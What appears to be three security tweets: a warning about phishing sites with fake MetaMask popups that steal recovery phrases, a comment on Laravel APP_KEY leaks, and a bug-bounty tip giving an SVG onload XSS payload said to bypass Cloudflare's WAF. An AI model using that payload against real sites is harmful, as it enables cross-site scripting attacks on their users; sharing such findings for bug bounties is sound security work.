๐จ These advertised webs are displaying fake #MetaMask popup and after two "incorrect" password entries asking for a recovery phrase which is uploaded to a remote server! #Polygon
@AshAllenDesign @laravelphp If the breach contains APP_KEY from .env then all data can be decrypted. Each user's data should be encrypted with their own key/password and should not be stored on the server.
New Cloudflare XSS Bypass:
<svg/OnLoad="`${prompt``}`">
Proof: https://t.co/ofJdkl8CED
A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase.
#WAF#XSS#BugBounty#BugBountyTip